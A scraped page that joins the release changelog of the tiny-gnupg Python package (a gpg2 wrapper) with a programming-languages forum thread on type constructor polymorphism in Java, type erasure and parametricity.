- Added the new Issue class. It takes care of raising exceptions & giving error messages to the user for issues which aren’t caused by calling the gpg2 binary. This comes with some refactorings.
Minor Changes
- Various code cleanups & refactorings.
Changes for version 0.7.5
Major Changes
- New Terminal, MessageBus & Error classes were created to assist in some heavy refactorings of the codebase. Separating error handling logic & sending commands to the terminal into their own classes & methods.
Minor Changes
- Removed the import-drop-uids option from the package’s import commands for several reasons. First, this option doesn’t work on most systems. Second, if it did work, the result would be problematic, as that would mean all uid information would always be dropped from imported keys. This option was intended to keep GnuPG from crashing when importing keys which don’t have uid information, but it’s an unideal hack around the root problem.
- Some changes to function signatures for a better ux, & various code cleanups.
Changes for version 0.7.4
Minor Changes
- The homedir, options, executable, _base_command, & _base_passphrase_command attributes are now all properties. This keeps their values in-sync even after a user changes a GnuPG instance’s configurations. This also backtracks the last update’s solution of reseting static values after every mutation, to a solution which reads attributes live as they’re queried. The reduced efficiency of not using cached values is not noticeable in comparison to the many milliseconds it takes to run any gpg2 command.
- Reordering of the methods in the GnuPG class to better follow a low-level to high-level overall semantic structure, with positional groupings of methods which have related functionalities.
- Some other code refactorings, cleanups & docstring fixes.
Changes for version 0.7.3
Minor Changes
- Now, after either the paths for the executable, homedir or config file are changed by the user, the _base_command & _base_password_command string attributes are reset to mirror those changes. This keeps the instance’s state coherent & updated correctly.
Changes for version 0.7.2
Minor Changes
- Changed the default directory for the gpg executable to /usr/bin/gpg2. This isn’t going to be appropriate for all users’ systems. But, now many users on linux installations won’t need to pass in a path manually to get the package to work.
Changes for version 0.7.1
Minor Changes
- Some interface refactorings for the Network class.
- Some docstring & readme fixes.
Changes for version 0.7.0
Major Changes
- The package no longer comes with its own gpg2 binary. The GnuPG class was altered so that a user can set the path to the binary that exists on their system manually. The path to the config file & to the home directory can also be set independently now as well. Although, the home directory & config file still default to the one’s in the package. These changes should allow users to more easily utilize the package even if they aren’t using Debian-like operating systems.
- The interface for the GnuPG class was also made a bit smaller by making some methods private.
- The asynchronous file import & export functions were switched to synchronous calls. This is a push towards a more sycnhronous focus, as the gpg2 binary & gpg-agent processes don’t play well with threaded or truly asynchronous execution. The networking asynchrony will remain.
- Heavy refactoring for method names to make the interface more unified & conherent.
- The GnuPG class now only receives keyword-only arguments. The username, email & passphrase parameters no longer use empty default string values.
- Removed the network_sks_import method which was no longer working. The onion sks server seems to change its onion address to frequently to maintain support within the package.
- Created Network & User classes to better separate concerns to dedicated & expressive objects.
Minor Changes
- Various refactorings.
- Some bug fixes in the html parsing of the keyserver responses.
Changes for version 0.6.1
Minor Changes
- Edits to test_tiny_gnupg.py.
Major Changes
- Cause of CI build failures found. The sks/pks keyserver’s onion address was not accessible anymore. They seemed to have switched to a new onion address available here:.
Changes for version 0.6.0
Minor Changes
- Changes to deduce bug causing CI failure.
Major Changes
- Switch from aiohttp_socks’s deprecated SocksProxy to the newer and supported ProxyConnector.
Changes for version 0.5.9
Minor Changes
- Add checks in network_sks_import() for html failute sentinels.
Major Changes
- Spread out the amount of queries per key in test_tiny_gnupg.py so the keyserver’s rate limiting policies don’t cause the CI build to fail as often.
Changes for version 0.5.8
Minor Changes
- Fix setup attribution kwargs in setup.py.
Major Changes
- Added new network_sks_import() method which allows users to query the sks infrastructure for public keys as well. We use an onion address mirror of the sks/pks network available here:.
- Added new manual kwarg to command which simplifies the process of using the GnuPG() class to manage gpg2 non-programmatically. Passing manual=True will allow users to craft commands and interact directly with the gpg2 interface.
Changes for version 0.5.7
Minor Changes
- Tests added to include checks for instance-isolated identities.
Major Changes
- reset_daemon() calls added to decrypt(), verify(), sign() & encrypt(). This call kills the gpg-agent process & restarts it, which in turn wipes the caching of secret keys available on the system without a passphrase. This is crucial for users of applications with multiple GnuPG objects that handle separate key identities. That’s because these methods will now throw PermissionError or LookupError if a private key operation is needed from an instance which is already assigned to another private key in the keyring. This gives some important anonymity protections to users.
- More improvements to error reporting.
Changes for version 0.5.6
Minor Changes
- Added newly developed auto_decrypt() & auto_encrypt() methods to the README.rst tutorial.
- Allow keyserver queries with spaces by replacing " " with url encoding "%20".
- packet_fingerprint(target="") & list_packets(target="") methods now raise TypeError when target is clearly not OpenPGP data.
- Tests added to account for new error handling in tiny_gnupg.py.
Major Changes
- --no-tty seems to keep most of the noise from terminal output while also displaying important banner information. For instance, signature verification still produces detailed signature information. Because it automatically seems to behave as desired, it’s here to stay.
Changes for version 0.5.5
Minor Changes
- Added to Known Issues. Our package can’t build on Github (Or most any CI service) for many reasons related their build environments using Docker & an issue in GnuPG itself.
- Removed Above known issue as a fix was found for using the Github CI tool.
- Added _home, _executable, & _options attributes which store the pathlib.Path.absolute() representation of the associated files & directories.
- Added options attribute with is the str value of the _options pathlib path to the configuration file used by the package.
Major Changes
- Added "--no-tty" option to command() method which conveniently tells gpg2 not to use the terminal to output messages. This has lead to a substantial, possibly complete, reduction in the amount of noise gpg2 prints to the screen. Some of that printed information is helpful to see, though. We would add it back in places where it could be informative, but passing "--no-tty" has the added benefit of allowing Docker not to break right out of the gate of a build test. More thought on this is required.
- Removed pathlib from imports. That module has been in the standard library since c-python3.4. This package isn’t looking to be supported for anything older than 3.6.
Changes for version 0.5.4
Minor Changes
- Style edits to PREADME.rst.
Major Changes
- Fixed a major bug in decrypt() which miscategorized a fingerprint scraped from a message as the sender’s, when in fact it should be the recipient’s. Getting the sender’s fingerprint requires successfully decrypting the message & scraping the signature from inside if it exists. We do this now, raising LookupError if the signature inside has no corresponding public key in the package keyring.
- Added new auto_encrypt() method which follows after auto_decrypt() in allowing a user to attempt to encrypt a message to a recipient’s key using the value in the uid kwarg. If there’s no matching key in the package keyring, then the keyserver is queried for a key that matches uid where then message is encrypted if found, or FileNotFoundError is raised if not.
- Added better exception raising throughout the GnuPG class:
- Now, instead of calling read_output() when the supplied uid has no key in the package keyring, a LookupError is raised.
- The best attempt at deriving a 40-byte key fingerprint from uid is returned back through the LookupError exception object’s value attribute for downstream error handling.
- verify() raises PermissionError if verification cannot be done on the message kwarg. Raises LookupError instead if a public key is needed in order to attempt verification. verify can’t be used on an encrypted messages in general, unless message is specifcally a signature, not encrypted plaintext. This is just not how verify works. Signatures are on the inside on encrypted messages. So decrypt() should be used for those instead, it throws if a signature is invalid on a message.
- A rough guide now exists for what exceptions mean, since we’ve given names & messages to the most likely errors, & helper functions to resolve them. Users can now expect to run into more than just the in decript CalledProcessError. Exceptions currently being used include: LookupError, PermissionError, TypeError, ValueError, KeyError, & FileNotFoundError.
- ValueError raised in text_export() & sign() switched to TypeError as it’s only raised when their secret or key kwargs, respectively, are not of type bool.
Changes for version 0.5.3
Minor Changes
- Fixing PyPi README.rst rendering.
Changes for version 0.5.2
Minor Changes
- Futher test cleanups. We’re now at 100% line coverage & 99% branch coverage.
- Code cleanups. raw_packets() now passes the uid information it’s gathered through the KeyError exception, in the value attribute instead of copying subprocess’s output attribute naming convention.
- License, coverage, package version badges added to README.rst.
Changes for version 0.5.1
Minor Changes
- Fixed inaccuracies & mess-ups in the tests. Added tests for parsing some legacy keys’ packets with raw_packets().
Major Changes
- Bug in the packet parser has been patched which did not correctly handle or recognize some legacy key packet types. This patch widens the pool of compatible OpenPGP versions.
Changes for version 0.5.0
Minor Changes
- Removed coverage.py html results. They are too big, & reveal device specific information.
Changes for version 0.4.9
Minor Changes
- Various code cleanups.
- Added to test cases for auto fetch methods & packet parsing.
- Documentation improvements: README.rst edits. CHANGES.rst Known Issues moved to its own section at the top. Docstrings now indicate code args & kwargs in restructured text, double tick format.
- Added use-agent back into the gpg2.conf file to help gnupg to not open the system pinentry window. This may have implications for anonymity since multiple instances runnning on a user machine will be able to use the same agent to decrypt message’s, even if the decrypting instance wasn’t the intended recipient. This may be removed again. A factor in this decision is that, it’s not clear whether removing it or adding no-use-agent would even have an impact on the gpg-agent’s decisions.
- _session, _connector, session & connector contructors were renamed to title case, since they are class references or are class factories. They are now named _Session, _Connector, Session & Connector.
- Added some functionality to setup.py so that the long_description on PyPI which displays both README.rst & CHANGES.rst, will also be displayed on github through a combined README.rst file. The old README.rst is now renamed PREADME.rst.
Major Changes
- 100% test coverage!
- Fixed bug in raw_packets() which did not return the packet information when gnupg throws a “no private key” error. Now the packet information is passed in the output attribute of the KeyError exception up to packet_fingerprint() and list_packets(). If another cause is determined for the error, then CalledProcessError is raised instead.
- packet_fingerprint() now returns a 16 byte key ID when parsing packets of encrypted messages which would throw a gnupg “no private key” error. The longer 40 byte fingerprint is not available in the plaintext packets.
- New list_packets() method added to handle the error scraping of raw_packets() & return the target’s metadata information in a more readable format.
- Fixed bug in format_list_keys() which did not properly parse raw_list_keys(secret=False) when secret was toggled to True to display secret keys. The bug would cause the program to falsely show that only one secret key exists in the package keyring, irrespective of how many secret keys were actually there.
- Added a second round of fingerprint finding in decrypt() and verify() to try at returning more accurate results to callers and in the raised exception’s value attribute used by auto_decrypt() & auto_verify().
Changes for version 0.4.8
Minor Changes
- Fixed typos across the code.
- Added to test cases.
- Documentation improvements. CHANGES.md has been converted to CHANGES.rst for easy integration into README.rst and long_description of setup.py.
- README.rst tutorial expanded.
- Condensed command constructions in set_base_command() and gen_key() by reducing redundancy.
- Fixed delete() method’s print noisy output when called on a key which doesn’t have a secret key in the package’s keyring.
Major Changes
- Added a secret kwarg to list_keys() method which is a boolean toogle between viewing keys with public keys & viewing keys with secret keys.
- Added a reference to the asyncio.get_event_loop().run_until_complete function in the package. It is now importable with from tiny_gnupg import run or from tiny_gnupg import *. It was present in all of the tutorials, & since we haven’t decided to go either all async or sync yet, it’s a nice helper.
- Added raw_packets(target="") method which takes in OpenPGP data, like a message or key, & outputs the raw terminal output of the --list-packets option. Displays very detailed information of all the OpenPGP metadata on target.
- Added packet_fingerprint(target="") method which returns the issuer fingerprint scraped off of the metadata returned from raw_packets(target). This is a very effective way to retrieve uid information from OpenPGP signatures, messages & keys to determine beforehand whether the associated sender’s key is or isn’t already in the package’s keyring.
Changes for version 0.4.7
Minor Changes
- Fixed typos across the code.
- Added to test cases.
- Added tests explanation in test_tiny_gnupg.py.
- Documentation improvements.
Major Changes
- Added exception hooks to decrypt() & verify() methods. They now raise KeyError when the OpenPGP data they’re verifying require a signing key that’s not in the package’s keyring. The fingerprint of the required key is printed out & stored in the value attribute of the raised exception.
- Added new auto_decrypt() & auto_verify() async methods which catch the new exception hooks to automatically try a torified keyserver lookup before raising a KeyError exception. If a key is found, it’s downloaded & an attempt is made to verify the data.
Changes for version 0.4.6
Minor Changes
- Added to test cases.
- Changed the project long description in the README.rst.
- Added docstrings to all the methods in the GnuPG class, & the class itself.
Major Changes
- Turned off options in gpg2.conf require-cross-certification and no-comment because one or both may be causing a bug where using private keys raises an “unusable private key” error.
Changes for version 0.4.5
Minor Changes
- Updated package metadata files to be gpg2.conf aware.
Major Changes
- Added support for a default package-wide gpg2.conf file.
Changes for version 0.4.4
Minor Changes
- Added new tests. We’re at 95% code coverage.
Major Changes
- Changed the default expiration date on generated keys from never to 3 years after created. This is both for the integrity of the keys, but also as a courtesy to the key community by not recklessly creating keys that never expire.
- Added revoke(uid) method, which revokes the key with matching uid if the secret key is owned by the user & the key passphrase is stored in the instance’s passphrase attribute.
Changes for version 0.4.3
Minor Changes
- Changed package description to name more specifically the kind of ECC keys this package handles.
- Removed the trailing newline character that was inserted into the end of every encrypt() & sign() message.
- Added new tests.
Major Changes
- Fixed bug in __init__() caused by the set_base_command() not being called before the base commands are used. This leading to the fingerprint for a persistent user not being set automatically.
Changes for version 0.4.2
Minor Changes
- Added some keyword argument names to README.rst tutorials.
- Added section in README.rst about torification.
Major Changes
- Added a check in encrypt() for the recipient key in the local keyring which throws if it doesn’t exist. This is to prevent gnupg from using wkd to contact the network to find the key on a keyserver.
- Added a new torify=False kwarg to __init__() which prepends "torify" to each gpg2 command if set to True. This will make sure that if gnupg makes any silent connections to keyservers or the web, that they are run through tor & don’t expose a users ip address inadvertently.
Changes for version 0.4.1
Minor Changes
- Fixed typos in tiny_gnupg.py.
Changes for version 0.4.0
Minor Changes
- Added keywords to setup.py
- Added copyright notice to LICENSE file.
- Code cleanups.
- Updated README.rst tutorials.
- Added new tests.
- Include .gitignore in MANIFEST.in for PyPI.
- Made all path manipulations more consistent by strictly using pathlib.Path for directory specifications.
- Added strict truthiness avoidance to sign() for the key boolean kwarg.
- Added strict truthiness avoidance to text_export() for the secret boolean kwarg.
Major Changes
- Added key kwarg to the sign(target="", key=False) method to allow users to toggle between signing arbitrary data & signing a key in the package’s local keyring.
- Changed the message kwarg in sign(message="") to target so it is also accurate when the method is used to sign keys instead of arbitrary data.
Changes for version 0.3.9
Minor Changes
- Added new tests.
Major Changes
- Fixed new crash caused by --batch keyword in encrypt(). When a key being used to encrypt isn’t ultimately trusted, gnupg raises an error, but this isn’t a desired behavior. So, --batch is removed from the command sent from the method.
Changes for version 0.3.8
Minor Changes
- Added new tests.
- Removed base_command() method because it was only a layer of indirection. It was merged into command().
Major Changes
- Added the --batch, --quiet & --yes arguments to the default commands contructed by the command() method.
- Added the --quiet & --yes arguments to the command constructed internally to the gen_key() method.
- Added a general uid —> fingerprint uid conversion in delete() to comply with gnupg limitations on how to call functions that automatically assume yes to questions. The Up-shot is that delete() is now fully automatic, requiring no user interaction.
Changes for version 0.3.7
Minor Changes
- Added new tests.
- Typos & inaccuracies fixed around the code & documentation.
Major Changes
- Added new secret kwargs to text_export(uid, secret=bool) and file_export(path, uid, secret=bool) to allow secret keys to be exported from the package’s environment.
- Added new post(url, **kw) & get(url, **kw) methods to allow access to the networking tools without having to manually construct the network_post() & network_get() context managers. This turns network calls into one liners that can be more easily wrapped with an asyncio run function.
Changes for version 0.3.6
Minor Changes
- Added new tests for networking methods.
- Documentation updates & accuracy fixes.
Major Changes
- Removed a check in network_import() which wasn’t useful and should’ve been causing problems with imports, even though the tests didn’t seem to notice.
Changes for version 0.3.5
Minor Changes
- Switched the aiocontext package license with the license for asyncio-contextmanager.
Major Changes
- The packaging issues seem to be resolved. Packaging as v0.3.5-beta, the first release that did not ship completely broken through pip install –user tiny_gnupg.
Changes for version 0.3.4
Major Changes
- Fixing a major bug in the parameters passed to setup() which did not correctly tell setuptools to package the gpghome folder & gpg2 binary. This may take a few releases to troubleshoot & bug fix fully.
Changes for version 0.3.3
Major Changes
- Fixed a big bug where the wrong package was imported with the same name as the intended module. AioContext was imported in setuptools, but the package that is needed is asyncio-contextmanager for its aiocontext module. This lead to the program being un-runable due to an import error.
Changes for version 0.3.2
Minor Changes
- Rolled back the changes in trust() that checked for trust levels on keys to avoid sending an unnecessary byte of data through the terminal. Mostly because the attempted fix did not fix the issue. And the correct fix involves a wide branching of state & argument checking. That runs contrary to the goal of the package for simplicity, so it isn’t going to be addressed for now.
- Edited some of the README.rst tutorials.
Major Changes
- Fix bug in file_import() method where await wasn’t called on the keyfile.read() object, leading to a crash.
Changes for version 0.3.1
Minor Changes
- Fixed a bug in trust() which caused an extra b“y\n” to be sent to the interactive prompt when setting keys as anything but ultimately trusted. This was because there’s an extra terminal dialog asking for a “y” confirmation that is not there when a key is being set as ultimately trusted. This didn’t have a serious effect other than displaying a “Invalid command (try ‘help’)” dialog.
- Removed local_user kwarg from the raw_list_keys() and trust() methods, as it doesn’t seem to matter which “user” perspective views the list of keys or modifies trust. It is very likely always displaying keys from the perspective of the global agent.
- Typos, redundancies & naming inaccuracies fixed around the code and documentation.
- Tests updated & added to.
Major Changes
- Fixed a bug in encrypt() which caused a “y\n” to be prepended to plaintext that was sent to ultimately trusted keys. This was because there’s an extra terminal dialog asking for a “y” confirmation that is not there when a key is ultimately trusted.
- Added a key_trust(uid) method to allow easy determination of trust levels set on keys in the local keyring.
Changes for version 0.3.0
Minor Changes
- Changed MANIFEST.in to a more specific include structure, & a redundant exclude structure, to more confidently keep development environment key material from being uploaded during packaging.
Major Changes
- Overhauled the gen_key() which now creates a different set of default keys. We are no longer creating one primary key which does certifying & signing, with one subkey which handles encryption. Instead, we create one certifying primary key, with three subkeys, one each for handling encryption, authentication, & signing. This is a more theoretically secure default key setup, & represents a common best-practice.
Changes for version 0.2.9
Minor Changes
- Edited some of the README.rst tutorials
- Changed file_import()’s filename kwarg to path for clarity.
- Fixed bug in trust() which would allow a float to be passed to the terminal when an integer was needed.
- Changed the way the email address in displayed in network_export(), removing the surrounding list brackets.
- Changed the FILE_PATH global to HOME_PATH for clarity.
- Changed the id_link variable in network_import() to key_url for clarity.
Major Changes
- Fixed a bug in format_list_keys() which would imporperly split the output string when uid information contained the "pub" string.
Changes for version 0.2.8
Minor Changes
- Edited some of the README.rst tutorials.
Major Changes
- Fixed a bug in the trust() method which caused it to never complete execution.
- Fixed a bug in the trust() method which falsely made 4 the highest trust level, instead of 5.
Changes for version 0.2.7
Minor Changes
- Fixed statement in README.rst describing bug #T4393.
Changes for version 0.2.6
Minor Changes
- Typos, redundancies & naming inaccuracies fixed around the code and documentation.
- Added a new POST request tutorial to the README.rst.
- Added "local_user" kwarg to some more methods where the output could at least be partially determined by the point of view of the key gnupg thinks is the user’s.
Major Changes
- Added a signing toggle to the encrypt(sign=True) method. Now, the method still automatically signs encrypted messages, but users can choose to turn off this behavior.
- Added a trust(uid="", level=4) method, which will allow users to sign keys in their keyring on a trust scale from 1 to 4.
- Fixed a bug in set_fingerprint(uid="") which mistakenly used an email parameter instead of the locally available uid kwarg.
Changes for version 0.2.5
Minor Changes
- Typos, redundancies & naming inaccuracies fixed around the code and documentation.
- Tests updated & added to.
- Changed raw_network_export() & raw_network_verify() methods into raw_api_export() & raw_api_verify(), respectively. This was done for more clarity as to what those methods are doing.
Major Changes
- Added sign(message) & verify(message) methods.
- Changed the keyserver & searchserver attributes into properties so that custom port attribute changes are now reflected in the constructed url, & the search string used by a custom keyserver can also be reflected.
- Moved all command validation to the read_output() method which simplifies the construction of command() & will automatically shlex.quote() all commands, even those hard-coded into the program.
- Fixed bug in set_homedir() which did not construct the default gpghome directory string correctly depending on where the current working directory of the calling script was.
- Added local_user kwarg to encrypt() & sign() so a user can specify which key to use for signing messages, as gnupg automatically signs with whatever key it views as the default user key. Instead, we assume mesasges are to be signed with the key associated with the email address of a GnuPG class instance, or the key defined by the local_user uid if it is passed.
- Fixed –list-keys terminal output parsing. We now successfully parse & parameterize the output into email addresses & fingerprints, of a larger set of types of keys.
- Added delete() method for removing both public & private keys from the local keyring. This method still requires some user interaction because a system pinentry-type dialog box opens up to confirm deletion. Finding a way to automate this to avoid user interaction is in the work.
- Added automating behavior to the sign() & encrypt() methods so that keys which haven’t been verified will still be used. This is done by passing “y” (yes) to the terminal during the process of the command.
Changes for version 0.2.4
Minor Changes
- Updated setup.py with more package information.
- Typos, redundancies & naming inaccuracies fixed around the code and documentation.
- Tests updated & added to.
Changes for version 0.2.3
Minor Changes
Changes for version 0.2.2
Minor Changes
- Typos & naming inaccuracies fixed around the code and documentation.
- Switched the internal networking calls to use the higher level network_get() & network_post() methods.
- Removed redundant shlex.quote() calls on args passed to the command() method.
- Tests updated & added to.
Changes for version 0.2.1
Minor Changes
- The names of some existing methods were changed. parse_output() is now read_output(). gpg_directory() is now format_homedir(). The names of some existing attributes were changed. gpg_path is now executable, with its parent folder uri now stored in home. key_id is now fingerprint to avoid similarities with the naming convention used for the methods which query the package environment keys for uid information, i.e. key_fingerprint() & key_email().
Major Changes
- Good riddance to the pynput library hack! We figured out how to gracefully send passphrases & other inputs into the gpg2 commandline interface. This has brought major changes to the package, & lots of increased functionality.
- Many added utilities:
- Keys generated with the gen_key() method now get stored in a local keyring instead of the operating system keyring.
- aiohttp, aiohttp_socks used to power the keyserver queries and uploading features. All contact with the keyserver is done over tor, with async/await syntax. search(uid) to query for a key with matches to the supplied uid, which could be a fingerprint or email address. network_import(uid) to import a key with matches to the supplied uid. network_export(uid) to upload a key in the package’s keyring with matches to the supplied uid to the keyserver. Also, raw access to the aiohttp.ClientSession networking interface is available by using async with instance.session as session:. More info is available in the aiohttp docs
- New text_import(key), file_import(filename), text_export(key), & file_export(path, uid) methods for importing & exporting keys from key strings or files.
- New reset_daemon() method for refreshing the system gpg-agent daemon if errors begin to occur from manual deletion or modification of files in the package/gpghome/ directory.
- New encrypt(message, recipient_uid) & decrypt(message) methods. The encrypt() method automatically signs the message, therefore needs the key passphrase to be stored in the passphrase attribute. The same goes for the decrypt() method.
- The command(*options), encode_inputs(*inputs), and read_output(commands, inputs) methods can be used to create custom commands to the package’s gpg2 environment. This allows for flexibility without hardcoding flexibility into every method, which would increase code size & complexity. The command() method takes a series of options that would normally be passed to the terminal gpg2 program (such as –encrypt) & returns a list with those options included, as well as, the other boiler-plate options (like the correct path to the package executable, & the package’s local gpg2 environment.). encode_inputs() takes a series of inputs that will be needed by the program called with the command() instructions, & bytes() encodes them with the necessary linebreaks to signal separate inputs. read_output() takes the instructions from command() and inputs from encode_inputs() & calls subprocess.check_output(commands, input=inputs).decode() on them to retrieve the resulting terminal output.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
|
https://pypi.org/project/tiny-gnupg/0.9.0/
|
CC-MAIN-2022-27
|
refinedweb
| 7,894
| 58.18
|
Feedback
Getting Started
Discussions
Site operation discussions
Recent Posts
(new topic)
Departments
Courses
Research Papers
Design Docs
Quotations
Genealogical Diagrams
Archives
Vincent Cremet and Philippe Altherr: Adding Type Constructor Parameterization to Java, JOT vol. 7, no. 5.
We present a generalization of Java’s parametric polymorphism that enables parameterization of classes and methods by type constructors, i.e., functions from types to types. Our extension is formalized as a calculus called FGJω. It is implemented in a prototype compiler and its type system is proven safe and decidable. We describe our extension and motivate its introduction in an object-oriented context through two examples: the definition of generic data-types with binary methods and the definition of generalized algebraic data-types. The Coq proof assistant was used to formalize FGJω and to mechanically check its proof of type safety.
FGJω is a simple extension of (Featherweight) Java's generics, where type parameters may be type constructors (functions from types to types). This very readable paper finally made me understand GADTs.
(Previously: Generics of a Higher Kind on Scala's support for the same idea.)
I'm sure this is a nice paper, but at this point, I really have to doubt the chances of anything like this ever making it into "real" Java. I would like to be proven wrong, though...
Given the choice to go with type erasure as the "implementation" choice for generics in Java 5 (and look how well that turned out), I would hope that they don't actually attempt putting this in Java.
I don't see how erasure causes a problem for type constructor polymorphism.
Especially considering that Scala has erasure and type-constructor polymorphism.
As far as I know, Scala does not implement polymorphism by type erasure.
It does. You can prove it with a simple type case (here I use an unbounded existential type parameter but that's not essential to the demonstration).
scala> def test(x : List[_]) = x match {
| case _ : List[Int] => "it's ints!"
| case _ : List[String] => "it's strings!"
| }
<console>:5: warning: non variable type-argument Int in type pattern List[Int] is unchecked since it is eliminated by erasure
case _ : List[Int] => "it's ints!"
^
<console>:6: warning: non variable type-argument String in type pattern List[String] is unchecked since it is eliminated by erasure
case _ : List[String] => "it's strings!"
<console>:4: warning: match is not exhaustive!
missing combination $colon$colon
def test(x : List[_]) = x match {
^
test: (x: List[_])java.lang.String
scala> test(List('a', 'b', 'c'))
res1: java.lang.String = it's ints!
Ah, my mistake. Though such typecases are "impure" in some people's eyes, I sometimes find them useful to implement a kind of ad-hoc polymorphism, e.g. in Virgil, which does not (yet) have a typeclass mechanism, but has parametric types and does not erase them. This means that the compiler must specialize the code when compiling for the JVM. Full specialization of course causes problems with polymorphic recursion, unfortunately.
I think in Scala anytime erasure hurts you it's because you've violated parametricity. As you say that's sometimes useful. In Java erasure also hurts due to interference with other parts of the language. To answer your other question, that was the Scala library List but any type constructor would do.
What about allocating an array of a parametric type? Unlike parametrized classes, arrays in Java can be thought of as a type constructor that actually does reify its type parameters at runtime.
Note also that parametricity also interacts with inheritance--you can "hide" types by creating an unparameterized superclass and casting to the parameterized subclass. Doing so may not technically be a violation of parametricity. I also sometimes find this useful, e.g. (Virgil syntax, which I hope you can work out through context):
class Val {
}
class Box<T> extends Val {
field x: T;
new(x: T) { this.x = x; }
}
...
class Interpreter {
method unbox<T>(v: Val) -> T {
// cast and access value
return Box<T>.!(v).x;
}
method add(v1: Val, v2: Val) -> Val {
// note type inference for unbox() calls and Box.new() call
return Box.new(unbox(v1) + unbox(v2));
}
}
(Note that there is no language level boxing in Virgil--these are all simply user classes.)
Here's another example that reuses the Box and Val classes:
Box
Val
class Other {
method castOrNull<T>(v: Val) -> Box<T> {
// check if cast would succeed
if (Box<T>.?(v)) return Box<T>.!(v);
else return null; // cast would fail, return null
}
}
This kind of pattern has started to show up in lots of places in my compiler, and I find it pretty convenient. The first example can be done in Java, but the second example absolute requires reified types (or specialization).
That's an interesting point about parameterized subclasses and extracting values of a certain type using something like Maybe or Null. So I take it back: there are some parametriticy preserving ways to use full run time type information.
As for arrays in Scala, they are a bit complicated. For more than you ever wanted to know about how Scala deals with them see this document describing both the old and new system for arrays.
You're right, that is more than I wanted to know about Scala arrays :-) The conclusion I came to some time back was that if you want real parametric types with all the capabilities, you have two choices: type parameters are either implicit reified parameters, or type parameters are completely specialized away. As far as I know, Haskell (at least GHC) takes the former approach, and C++ obviously takes the latter approach. The CLR also specializes, but the VM does this underneath (type parameters are explicit in class files). Type erasure like Java is broken in too many ways to count.
If your language is going to have a VM, then I think the C# approach is best. If your language is going to target a real machine, then I think a mix of reification and specialization is the best approach, though I have yet to come across an implementation that does both.
I think you're wrong about GHC. Type classes are "implicit reified parameters" (although they're often specialized away), but plain old type parameters are erased. Maybe I misunderstand what you're saying, though.
Why would we not consider Box<T>.! and Box<T>.? to violate parametricity? Before reading any of this, I would have certainly considered casts or "can cast queries" as parametricity violations.
Box<T>.!
Box<T>.?
The conclusion I came to some time back was that if you want real parametric types with all the capabilities, you have two choices: type parameters are either implicit reified parameters, or type parameters are completely specialized away.
If run-time casts are among the capabilities you want, then this would seem to be true, but I don't see why it should be true otherwise. Do you have other examples or arguments? (As I'm working on a language with type erasure, I'd love to understand your reasoning here!)
I don't consider polymorphic casts of this type to be a violation of parametricity*, but there is another instance where problems arise. Even if you don't use runtime casts, if your types don't have a uniform representation in the machine you are translating to (e.g. primitives vs. objects on the JVM), you will need some runtime type information in order to, for example, allocate an array with the appropriate representation, or allocate an object that has a field of the parametric type. Worse, at the machine level, even passing a value of a parametric type might require a different register (or set of registers) depending on its type and the calling conventions established by your compiler or the ABI of your platform.
However, you are right in that most of the problems that manifest for programmers rather than implementors seem to stem from runtime type tests of one kind or another. For example, if you have inheritance and overriding in your language, you can try simulate casts by writing is/as methods, but even with the hidden type parameter, you still end up needing a polymorphic cast inside!
class A {
method isB<X>() -> bool { return false; }
method asB<X>() -> B<X> { return null; }
}
class B<T> extends A {
method isB<X>() -> bool {
// yes, we are a B<T>, but are we a B<X> ???
return B<X>.?(this);
}
method asB<X>() -> B<X> {
// hide the cast in here....
return B<X>.!(this);
}
}
So maybe I should amend my earlier conclusion. If you have a nonuniform representation of types in your implementation, or if you have runtime type tests of any kind, you will have to either reify or specialize to get the full power of parametric types.
* The possibility that a type test could fail or a cast throw an exception is independent of whether parametric types are involved.
I think much of my confusion in this subthread has been from the application of "parametricity" to an OOP setting. Parametricity is about types of functions reflecting the operations those functions perform on their parameters. If every value in the language is an object supporting "type casting" (really a form of constructor matching) then you'll still have some sort of "parametricity theorem", but the free theorems will be extremely weak (probably useless).
I favor not having any operations built in to every value, and letting values come equipped with extra tagging information in special situations if needed. Anyway, I agree with most of the stuff you wrote. This is just clarifying my position and explaining my confusion.
If every value in the language is an object supporting "type casting" (really a form of constructor matching) then you'll still have some sort of "parametricity theorem"
I don't see how. Casts and reflection break parametricity straight out, no way around that. The analogy with constructor matching is misleading, because with constructors there is no persistent 1-to-1 correspondence to types.
Well, it's not clear to me what parametricity means in a general setting. How are types in some arbitrary type system considered relations?
The construction I have in mind is to construct a type system "outside" of the original (possibly typed) language, for which function types and quantifiers mean what we want them to mean. Then we can get a parametricity theorem in this more general setting, and as long as types in the original langauge have corresponding types in the enriched type system, we can pull back our free theorems.
In order to assign a more traditional type to a value in the language, you have to have modeled all computation that can be performed in the language. For example, you have to model casts as operations on tagged data. You could probably also model side-effects functionally and get parametricity results for impure languages this way.
I await your objections :)
Well, it's not clear to me what parametricity means in a general setting.
Good question! FWIW, we tried to give some answers in our ICFP'09 paper.
How are types in some arbitrary type system considered relations?
Usually, you want the relational interpretation to be at least a sound approximation of observational equivalence. That is, it should never relate two objects that can be told apart by some program context. On the other hand, you need every well-formed object to be related to itself.
A (logical) relation is parametric if the case for polymorphic types is defined such that you can nevertheless always pick an arbitrary relation as representative for the quantified type. If you can still prove soundness of the relation then this implies that polymorphic types are really abstract.
A polymorphic function whose result depends on the outcome of some cast is not even related to itself under such a definition. Consequently, a parametric relation can't be sound in the presence of such casts.
I'm not sure I fully understand your suggestion or how it would change the situation. It seems like you are proposing to encode the non-parametric language in a parametric one. That can be done, but then parametricity of the host language does not necessarily imply anything interesting about the object language. Also, to transfer any results you might need to know that your encoding is fully abstract, a property that generally is extremely hard to prove.
A (logical) relation is parametric if the case for polymorphic types is defined such that you can nevertheless always pick an arbitrary relation as representative for the quantified type.
Well, taking this to define the relation corresponding to e.g. List<T> in an OOP language with casting does look like it will break parametricity. I'm suggesting: don't do that. It seems that with a modified definition that restricts what relations we're quantifying over (and with similar modifications elsewhere), that we could preserve the statement of the parametricity theorem. I'm fuzzy on the details, though, and I can see why you would object to calling such a thing "parametricity".
I don't understand what you are trying to achieve. That is the distinguished meaning of "parametricity". What you propose is like redefining "non-smoking" to mean "no smoking, but igniting cigarettes is allowed", i.e. it simply renders the word meaningless.
As for the "parametricity theorem", there isn't really any such theorem. What Wadler calls the parametricity proposition is simply the so-called Fundamental Property or Fundamental Theorem of the logical relation - i.e., that every well-formed term is related to itself. In his case the relation was parametric, but you will have such a theorem for any suitable logical relation, parametric or not (see our aforementioned paper for an example of a non-parametric one). But of course, if the relation is non-parametric, you don't get any "free theorems" out of it.
